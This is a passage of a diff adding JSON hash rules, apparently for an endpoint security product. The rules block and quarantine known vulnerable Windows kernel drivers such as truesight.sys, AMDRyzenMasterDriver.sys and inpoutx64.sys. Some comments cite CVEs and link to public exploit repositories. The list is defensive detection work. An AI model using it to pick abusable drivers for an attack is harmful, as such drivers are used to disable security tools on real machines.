+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5adfedbb426cac12472d6122217cc34b32c1272870087132e6d3cc286a357e13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b92ef931-edc5-5b78-a11b-07098fb08583",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824611Z",
+ "creation_date": "2026-03-23T11:45:30.824614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "384f2761d6f92727598e6b0ba36dbe2187b4798631302dbf5f0692bd52383b98",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b93198b3-99db-50f5-ad34-eee3fdc33f5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822344Z",
+ "creation_date": "2026-03-23T11:45:31.822346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c881a4023af4368404f13117cc068690f718c73077c2560846924b241814ef81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b932b1fb-b062-5a92-8e1d-90008cd17b12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141042Z",
+ "creation_date": "2026-03-23T11:45:31.141044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50eaae094acb573f290dbee057df37b308d0e1405b56ff33c69beee9e5913a17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9369005-bb9d-5009-a8c6-e1607d617f68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472721Z",
+ "creation_date": "2026-03-23T11:45:31.472724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5e76fd04dc733abf48dff452b3be8cf09a1ad2ec54333f75386431566dce502",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b93793db-e229-50aa-a424-30e40d450bc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605138Z",
+ "creation_date": "2026-03-23T11:45:29.605140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9c121b6d68ce8ea989142ac98bd63e055b1fc9b720713e735569552503e362a",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b938dd8e-1d52-5993-aab3-ac8a52e60430",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617538Z",
+ "creation_date": "2026-03-23T11:45:29.617540Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94111de210f6b3b48dda16b3422f0f9180e30bcb5765b6858c451d1d89196199",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9556a25-65a4-5e32-9664-87f40587b349",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829272Z",
+ "creation_date": "2026-03-23T11:45:30.829274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9d6b6784b5616ea4ed45d1910502919676e93a7c0af895c879adff580cec18d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b967fb15-74a6-5e0a-a7cb-78fc5e6f5f12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144777Z",
+ "creation_date": "2026-03-23T11:45:31.144779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "137f68f02f7ce1c085474d0a61ee460ea597db6420c5930bd6dba282f329bf20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b968cbd6-cf44-5bc0-915c-18bc6ab5e700",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477192Z",
+ "creation_date": "2026-03-23T11:45:31.477196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477206Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b96438e685eff2d464e63035f5a6bd7f5a04bdcb9ad29d75d5143b79d1a94835",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b96f6d3b-d4ca-544b-b693-66ce8d4aebab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499377Z",
+ "creation_date": "2026-03-23T11:45:31.499408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499416Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "420bece9efaa2836e412bc552d46c18a47f5623a1cefad4e58f6d33e09d29683",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b97ce09c-5bf2-5b51-bb07-97cb9a8b572b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822185Z",
+ "creation_date": "2026-03-23T11:45:31.822187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca7a7790afb16b7ef72beb8c8f1b2d362db9b7c380d1fdc5117d8824db354020",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9818383-2a23-5ed9-bc1a-cfb36b904f1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975042Z",
+ "creation_date": "2026-03-23T11:45:29.975044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e81beae78e1ddbf6c150e15667e1f18783f9b0ab7fbe52c7ab63e754135948d",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9829f42-4c39-59f1-a3db-8b2075615189",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143816Z",
+ "creation_date": "2026-03-23T11:45:32.143818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143824Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2759e2290295a81e80ef5d8e95266aa08d67832c0af51267ad1100b89d8b890c",
+ "comment": "Vulnerable Kernel Driver (aka ACE-BASE.sys) [https://www.loldrivers.io/drivers/ff77b58d-e143-4f61-92de-c0d9bc0af7d5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b992a289-6657-5591-9dd2-deedf1746e4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148451Z",
+ "creation_date": "2026-03-23T11:45:31.148453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76ad8523b85c431b00e8025d7513a0a7058ec1fad1eda456b857087029a3119f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9979068-f152-5381-893b-283151f7aaa1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148590Z",
+ "creation_date": "2026-03-23T11:45:31.148592Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b377a73f5b7ac58897de2ee6108a2fb0401af9ad584a33902a9fcff40f5066e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b997cf40-f107-57ce-954e-2495517b4655",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984511Z",
+ "creation_date": "2026-03-23T11:45:29.984513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68b8f7154ad202145cf51ed2a8e21268af75efafff36db254e6943e154bd915a",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9a16e45-27cf-5725-bef5-42be4d291509",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618097Z",
+ "creation_date": "2026-03-23T11:45:29.618099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cc6b647174c8efa0a81ec1d3cb0464c8a567456571d0939fb2e76c6850bf7cb",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9b12495-17ae-558d-881e-380ecb88e74f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471569Z",
+ "creation_date": "2026-03-23T11:45:30.471572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41765151df57125286b398cc107ff8007972f4653527f876d133dac1548865d6",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9bd24c9-ab07-500d-9dd7-e0a03fd7dc18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478744Z",
+ "creation_date": "2026-03-23T11:45:31.478747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c27561b68e478bab9a1f391060c479ea67d6a23bf4531029c6bc94a4f9c5ff0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9d044a7-5b8a-5000-ba3c-29ec41ab46df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808128Z",
+ "creation_date": "2026-03-23T11:45:31.808132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6550963f98cc27366813fba3bcd61feb1f830a5e502384073ff6fad28158c97b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9d69e9f-edbd-5ef7-a305-9469b9c3e83c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812598Z",
+ "creation_date": "2026-03-23T11:45:31.812600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1075c8bdd4decafad2f1614ef5f9d60e4fc41a5c82510f5631484e6db222b49e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b9dfecd7-5ed1-5725-9c40-6c7365cdba9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142830Z",
+ "creation_date": "2026-03-23T11:45:32.142833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8bdfab9d5b5c37f6f23ddf9dddba2feb74261b61a80dee0c6aebffbf39948fb",
